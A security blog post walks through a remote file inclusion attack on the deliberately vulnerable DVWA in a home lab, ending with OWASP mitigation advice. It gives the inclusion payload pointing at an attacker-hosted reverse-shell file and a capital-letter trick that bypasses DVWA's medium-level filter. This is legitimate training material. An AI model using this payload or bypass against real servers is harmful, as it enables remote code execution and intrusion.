Gaining Access with Remote File Inclusion

-
Yesterday’s post explored gaining access to a webserver using a local file inclusion (LFI) exploit. Today, I will explore how to gain access using remote file inclusion (RFI). The main difference between LFI and RFI is the the former requires an attacker to upload a malicious payload to a target server. With RFI, an attacker can exploit a system by using a malicious file hosted on a remote system.

According to Impervia, RFI “is an attack targeting vulnerabilities in web applications that dynamically reference external scripts. The perpetrator's goal is to exploit the referencing function in an application to upload malware (e.g., backdoor shells) from a remote URL located within a different domain” (https://www.incapsula.com/web-application-security/rfi-remote-file-inclusion.html). Generally speaking, both of these attacks are usually accompanied by a directory traversal attack which can lead to revealing sensitive data and increase the effectiveness of an attack.

The tools used to demonstrate this attack were Kali Linux, used as the attacker machine (https://www.kali.org/downloads/), Metasploitable (https://information.rapid7.com/metasploitable-download.html) and the Damn Vulnerable Web Application (DVWA) that came preinstalled on Metasploitable. As mentioned in my previous post, DVWA can be installed on any host as a standalone program from http://www.dvwa.co.uk/.  Finally, these machines were all hosted in a virtual environment using VirtualBox from Oracle (https://www.virtualbox.org/wiki/Downloads).

The first step was to write a basic PHP script on my attacker machine. For this, I used Leafpad on Kali. This script is the same script that was used in my demonstration for LFI. It uses the PHP function passthru(), which as mentioned previously, “is similar to the exec() function in that it executes a command. This function should be used in place of exec() or system() when the output from the Unix command is binary data which needs to be passed directly back to the browser” (http://php.net/manual/en/function.passthru.php). Additionally, it executes netcat with the attacker IP to listen for connections on port 1234.

Step 1 - Write PHP Script.jpg

Next, the document was saved as a .txt file as opposed to a PHP file to prevent this from running on the attacker machine. This code is meant to be executed on the target system. Additionally, it was saved in the /var/www/html directory.
Step 2 - save in var www html as txt.jpg

To ensure that this file is accessible to the web, I navigated to localhost/reverse.txt which returned the contents of the malicious file created above.

Step 3 - Go to localhost slash reverse dot txt.jpg

Once I confirmed that the file was able to be accessed, I began a netcat listener on the attacker machine set to listen on port 1234.

Step 8 - resestablish netcat listener.jpg

Next, I changed the URL parameters for page= to direct the browser to the malicious file. I added the ? at the end of the URL to instruct the target machine to run this file as a PHP file type.
Step 4 - Returned Results upon execution.jpg

Once the request was sent, the netcat connection was made and I was successfully able to execute commands on the target server.

Step 6 - Execute commands success.jpg

I wanted to see if this attack would be successful if the web application had more beefed up security setting enabled. I changed the DVWA security settings from low to medium.

Medium security setting.jpg

I first established a new netcat listener on the same port.

Step 8 - resestablish netcat listener.jpg

I then refreshed the web browser.

Step 4 - Returned Results upon execution.jpg

I then went back to my netcat and noticed that there was no connection made.

Step 8 - resestablish netcat listener.jpg

I decided to inspect the source code provided by DVWA for the file inclusion with medium security settings.

Step 12 - Source Code.jpg

While these security settings do utilize input validation, it does not do so effectively. I simply changed the page=http://10.0.2.5/reverse.txt parameter by using capital T’s (page=hTTp://10.0.2.5/reverse.txt) and was able to establish a netcat connection to the target machine.

Step 10 - replace with capital t's.jpg

Step 11 - Final Success.jpg

To mitigate against this type of attack, developes should prevent remove file inclusions by disabling the  allow_url_fopen & allow_url_include functions. Secondly, developers should aim to use static file inclusions. Secondly, OWASP recommends developers to “avoid passing user-submitted input to any filesystem/framework API. If this is not possible the application can maintain a white list of files, that may be included by the page, and then use an identifier (for example the index number) to access to the selected file. Any request containing an invalid identifier has to be rejected, in this way there is no attack surface for malicious users to manipulate the path” (https://www.owasp.org/index.php/Testing_for_Remote_File_Inclusion).

Comments

Post a Comment

Popular posts from this blog

Master Port List

-
TCP  0  Reserved TCP  1  Port Service Multiplexer TCP  2  Management Utility TCP  3  Compression Process TCP  4  Unassigned TCP  5  Remote Job Entry TCP  6  Unassigned TCP  7  Echo TCP  8  Unassigned TCP  9  Discard TCP  10  Unassigned TCP  11  Active Users TCP  12  Unassigned TCP  13  Daytime (RFC 867) TCP  14  Unassigned TCP  15  Unassigned [was netstat] TCP  16  Unassigned TCP  17  Quote of the Day TCP  18  Message Send Protocol TCP  19  Character Generator TCP  20  File Transfer [Default Data] TCP  21  File Transfer [Control] TCP  22  SSH Remote Login Protocol TCP  23  Telnet TCP  24  any private mail system TCP  25  Simple Mail Transfer TCP  26  Unassigned TCP  27  NSW User System FE TCP  28  Unas...
Read more

Installing and Configuring WebGoat

-
Image
After doing some research, I found WebGoat. WebGoat is a deliberately insecure web application developed by the Open Web Application Security Project (OWASP) and was developed to teach users how to learn web application penetration testing. More information on OWASP can be found at https://www.owasp.org . To install WebGoat, the following is needed: Linux (for my purposes, I am using Kali Linux) https://www.kali.org/downloads/   Apache Tomcat http://tomcat.apache.org/ WebGoat https://s3.amazonaws.com/webgoat-war/webgoat-container-7.0-SNAPSHOT-war-exec.jar Java https://www.java.com/en/download/help/linux_x64_install.xml It is important to note that many Linux systems come preconfigured with Java out of the box. An easy way to find out is by running the simple command java -version The architecture of WebGoat is very simple. The diagram below shows exactly what is required (other than the Java dependency). Steps to Installing and Configuring WebGoat ...
Read more

Exploiting File Upload Vulnerabilities with DVWA

-
Image
This exercise explores vulnerabilities associated with file uploads. The target machine was the Damn Vulnerable Web Application (DVWA) found at http://www.dvwa.co.uk/ however, this web application came preinstalled with Metasploitable 2 found at https://information.rapid7.com/metasploitable-download.html . DVWA, according to its website, “is a PHP/MySQL web application that is damn vulnerable. Its main goals are to be an aid for security professionals to test their skills and tools in a legal environment, help web developers better understand the processes of securing web applications and aid teachers/students to teach/learn web application security in a classroom environment” ( http://www.dvwa.co.uk/ ). Metasploitable “is virtual machine based on Linux that contains several intentional vulnerabilities for you to exploit. Metasploitable is essentially a penetration testing lab in a box, available as a VMware virtual machine (VMX),” ( https://information.rapid7.com/metasploitabl...
Read more